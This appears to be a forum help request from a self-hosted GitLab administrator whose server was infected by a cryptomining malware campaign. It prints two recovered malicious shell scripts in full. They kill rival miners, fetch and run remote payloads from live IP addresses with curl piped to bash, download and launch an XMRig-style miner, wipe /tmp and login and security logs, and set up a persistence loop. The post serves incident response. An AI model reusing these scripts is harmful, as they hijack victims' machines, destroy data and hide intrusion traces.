I have a ubuntu server with self hosted giltab-ce and two days ago my server started using 400% CPU. My hosting provider advised me to update my Gitlab (which was version 13.6.1), that I updated to 13.9. Still, periodically, there is some process that is starting running and uses more than all the CPU.
At the beginning, I was thinking this was the issue (because the hosting provider attached this link to the email): https://hackerone.com/reports/1154542
Then I saw that the process name was kdevtmpfsi and followed all answers of this question: kdevtmpfsi using the entire CPU
Still nothing helped, the scripts periodically starts over and over again after a few hours.
In /tmp/.ssh folder I found a redis.sh script with this content:
while true
do
killall -q -9 kdevtmpfsi
killall -q -9 kinsing
killall -q -9 xmrig
killall -q -9 xmr
killall -q -9 qwer
pkill -9 kthreaddk
pkill -9 kwolker
pkill -9 mini
pkill -9 kacpi_notifyd
pkill -9 vim
pkill -9 mym
pkill -9 network
pkill -9 .libs
pkill -9 javase
pkill -9 libexec
rm -rf /usr/lib/vmware-vsphere-ui/server/postgres
rm -rf /usr/lib/vmware-vsphere-ui/server/postgres_start.sh
rm -rf /usr/lib/vmware-vsphere-ui/server/kvm.sh
rm -rf /usr/lib/vmware-vsphere-ui/server/elastic.sh
rm -rf $HOME/postgres
rm -rf $HOME/kvm.sh
rm -rf $HOME/elastic.sh
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbused' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cpu-force-autoconfig' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'kvm.sh' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'elastic.sh' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'wget' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'curl' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'urlopen' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep '/var/tmp/.postgres/' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'postgres_start.sh' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'xmrig' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'xmr' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'kthreaddk' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep 'kthreaddi' | awk '{print $2}' | xargs -i kill -9 {}
PROC_NAME=/tmp/system
ProcNumber=`ps -ef |grep -w $PROC_NAME|grep -v grep|wc -l`
if [ $ProcNumber -le 0 ];then
if hash curl 2>/dev/null;then
curl http://135.125.217.87/stl.sh | bash >/dev/null 2>&1 &
else
python -c "import requests;url='http://165.227.239.108/stl.sh';tmp=requests.get(url);open('./static.sh','wb').write(tmp.content)"
bash ./static.sh >/dev/null 2>&1 &
fi
break
fi
done
I removed that file, created a blank one and gave only read permission.
The user that invokes this process is git. I stopped gitlab and deleted the git user.
Could you please advise me what to do next? What I would like to understand is the process that creates those files and cronjobs.
I'm trying everything but after a few hours the problem returns. What should I look for when it returns next time?
Edit: I found another file that I think is the one that is downloading the one I pasted on top.
dan@dan:~/$ cat stl.sh
rm -rf /var/tmp/*
rm -rf /tmp/*
killall -q -9 /var/tmp/.postgres/*
ps aux | grep -v grep | grep 'runnerbus' | awk '{print $2}' | xargs -i kill -9 {}
rm -rf /var/tmp/.postgres
rm -rf /tmp/.*
rm -rf /var/tmp/.*
rm -rf /etc/cron.hourly/oanacroner
rm -rf /etc/cron.hourly/oanacrona
rm -rf /etc/cron.daily/oanacroner
rm -rf /etc/cron.daily/oanacrona
rm -rf /etc/cron.monthly/oanacroner
rm -rf xmrig-6.13.1/
rm -rf xmrig-6.13.1-linux-x64.tar.gz
rm -rf $HOME/moneroocean/
rm -rf /var/tmp/moneroocean/
rm -rf /root/moneroocean/
rm -rf $HOME/c3pool/
rm -rf /tmp/.tmp/xlog
rm -rf /var/tmp/.postgres
rm -rf /tmp/kwolker
rm -rf /tmp/kdevtmpfsi
rm -rf /tmp/kinsing
rm -rf /tmp/libexec
rm -rf /tmp/mym
rm -rf /usr/bin/kinsing*
rm -rf /etc/cron.d/kinsing*
ps aux | grep -v grep | grep 'postgres_start.sh' | awk '{print $2}' | xargs -i kill -9 {}
ps aux | grep -v grep | grep '/var/tmp/.postgres_start/postgres_start.sh' | awk '{print $2}' | xargs -i kill -9 {}
killall -q -9 workrun.sh
killall -q -9 /tmp/kwolker
killall -q -9 /tmp/mym
killall -q -9 xmr
killall -q -9 kdevtmpfsi
killall -q -9 kinsing
killall -q -9 xmrig
killall -q -9 minerd
killall -q -9 minerd
killall -q -9 xig
killall -q -9 cpuminer
pkill -9 kworker
pkill -9 kwolker
pkill -9 mym
sleep 1
if hash curl 2>/dev/null;then
echo "has curl 1"
curl --progress-bar http://135.125.217.87/static.c -o /tmp/system
else
echo "haven't curl 1"
python -c "import requests;url='http://135.125.217.87/static.c';tmp=requests.get(url);open('./system','wb').write(tmp.content)"
fi
chmod +x /tmp/system
mkdir /tmp/.ssh
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/utmp
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/message
sed -i '/107.191.63.34/'d /var/log/messages
sed -i 's/107.191.63.34/127.0.0.1/g' secure
/tmp/system -o 207.38.87.6:3333 -p $HOSTNAME -k -B --cpu-priority 5 -l /tmp/.ssh/xlog --randomx-1gb-pages >/dev/null 2>&1
sleep 1
if hash curl 2>/dev/null;then
echo "has curl 2"
curl http://135.125.217.87/stlalive.sh -o /tmp/.ssh/redis.sh
else
mkdir /tmp/.ssh
echo "haven't curl 2"
python -c "import requests;url='http://135.125.217.87/stlalive.sh';tmp=requests.get(url);open('/tmp/.ssh/redis.sh','wb').write(tmp.content)"
fi
sleep 1
chmod +x /tmp/.ssh/redis.sh
nohup /tmp/.ssh/redis.sh >/dev/null 2>&1 &
rm -rf ./run.sh
I removed this file, created a new file with the same name only readable. Then I stopped all processes from git, removed git user again. Recofigured gitlab. It's 10 hours since no other attack.